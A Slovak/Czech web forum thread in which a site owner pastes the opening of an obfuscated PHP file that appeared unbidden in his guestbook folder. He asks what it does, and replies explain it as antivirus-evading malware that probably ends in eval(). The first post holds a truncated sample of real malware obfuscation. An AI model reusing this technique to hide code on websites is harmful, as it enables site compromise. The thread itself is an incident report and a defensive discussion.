| Autor | Zpráva | ||
|---|---|---|---|
| Dano_V Profil * |
#1 · Zasláno: 3. 8. 2016, 22:30:03
Zdravím vás všetkých
Robil som revíziu môjho website a zistil som, že mi tam pribudol jeden súbor s divným kódom. Na stránke mám formulár, odkial sa zapisujú dáta do knihy, a tá kniha s tým php súborom, ktorý to zapisuje (index.php) sú v samostatnom adresáry. Kniha sa volá odkazy.dat a vedľa nich pribudol súbor s názvom odkazy.php. Z obsahu tohto kódu na ukážku tu dám kúsok, <?php $NWMKeERVkXq='ZjNH]cJhYK,Pm$[Oirf9yE1q3tIAgs2d{vw;U)k7^e/SWu6Q(Rb.nx|}C0"5G8LBaDM_*o FXl+pVz4T';$LYxkyoSvESS=$NWMKeERVkXq{5}.$NWMKeERVkXq{17}.$NWMKeERVkXq{41}.$NWMKeERVkXq{64}.$NWMKeERVkXq{25}.$NWMKeERVkXq{41}.$NWMKeERVkXq{67}.$NWMKeERVkXq{18}.$NWMKeERVkXq{45}.$NWMKeERVkXq{52}.$NWMKeERVkXq{5}.$NWMKeERVkXq{25}.$NWMKeERVkXq{16}.$NWMKeERVkXq{69}.$NWMKeERVkXq{52};$HfYudtkeaLo=$NWMKeERVkXq{13}.$NWMKeERVkXq{29};$WXcdwcMyvWq=$NWMKeERVkXq{18}.$NWMKeERVkXq{45}.$NWMKeERVkXq{52}.$NWMKeERVkXq{5}.$NWMKeERVkXq{25}.$NWMKeERVkXq{16}.$NWMKeERVkXq{69}.$NWMKeERVkXq{52}.$NWMKeERVkXq{70}.$NWMKeERVkXq{17}.$NWMKeERVkXq{61}.$NWMKeERVkXq{48}.$NWMKeERVkXq{13}.$NWMKeERVkXq{29}.$NWMKeERVkXq{10}.$NWMKeERVkXq{13}.$NWMKeERVkXq{75}.$NWMKeERVkXq{37}.$NWMKeERVkXq{32}.$NWMKeERVkXq{17}.$NWMKeERVkXq{41}.$NWMKeERVkXq{25}.$NWMKeERVkXq{45}.$NWMKeERVkXq{17}.$NWMKeERVkXq{52}.$NWMKeERVkXq{70}.$NWMKeERVkXq{13}.$NWMKeERVkXq{29}.$NWMKeERVkXq{40}.$NWMKeEa chcem sa opýtať, či sa z takého kódu dá zistiť, čo to chce robiť, a k čomu to môže slúžiť. Je samozrejme ešte asi 6 - 8 krát taký dlhý, ako som to sem nakopíroval. A skončí sa to tradičným znakom ?>.
Toto je už druhý prípad, že som takýto súbor tam našiel, kvôli tomu som si dal zmeniť aj ftp heslo, aj som sa opýtal poskytovateľa, či mi to tam oni nedali náhodou, ale tvrdia, že nie. A teraz tam mám znova zakýto súbor, čo som tam nedal ja. Preto by som chcel vedieť, či sa to dá zistiť, či je to nejaký špionážny skrip, alebo má v úmysle niekomu škodiť? Lebo sám od seba určite nevznikol. Niekto to tam musel dať. |
||
| Martin2 Profil * |
#2 · Zasláno: 4. 8. 2016, 00:30:03
|
||
| Adam1999 Profil |
#3 · Zasláno: 4. 8. 2016, 07:58:34
Toto se mi hodně stávalo u Wedosu u WordPress webů.
Je to nějaký hack či co. Pořádně sám nevím co to dělá u každého webu to dělalo něco jiného. Weby jsem kompletně přeinstalovat a přesunul na svůj vlastní server s ftp SSL, od té doby nic. |
||
| Martin2 Profil * |
#4 · Zasláno: 4. 8. 2016, 11:48:31
Adam1999:
„Pořádně sám nevím co to dělá u každého webu to dělalo něco jiného“ Kód je náhodně zamíchaný jako ochrana proti antivirům, které si už nějakou dobu PHP malwaru všímají (na straně vývojáře, ne serveru, samozřejmě). Někde na konci bude asi eval() toho, co vznikne v proměnné $LYxkyoSvESS.
|
||
|
Časová prodleva: 9 let
|
|||
0